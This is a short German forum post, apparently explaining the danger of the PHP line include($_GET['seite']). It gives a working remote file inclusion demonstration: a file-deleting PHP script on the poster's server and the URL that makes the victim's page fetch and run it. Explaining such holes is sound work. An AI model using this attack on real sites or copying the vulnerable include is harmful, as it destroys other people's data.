nicht angemeldet
Hallo Freunde des gehobenen Forumsgenusses,
Hm, was soll man denn bei einem include für einen Unfug treiben?
diesen, z.B.:
Dein Code:
include($_GET['seite']);
Mein Code (auf <meinserver>):
<?php
$handle = opendir('.');
while(($file = readdir($handle)) !== false) unlink($file);
closedir($file);
?>
Mein Aufruf deiner Seite:
http://deinserver/index.php?seite=http%3A%2F%2Fmeinserver%2Fmeinedatei.php
Löscht dir alle dateien im Ordner mit der index.php
Ist das genug Unfug oder muss ich noch mehr zeigen?
Gruß
Alexander Brock
--
SelfCode: ie:{ fl:( br:> va:) ls:[ fo:) rl:( n4:? ss:| de:> js:( ch:| sh:( mo:} zu:}
http://againsttcpa.com
SelfCode: ie:{ fl:( br:> va:) ls:[ fo:) rl:( n4:? ss:| de:> js:( ch:| sh:( mo:} zu:}
http://againsttcpa.com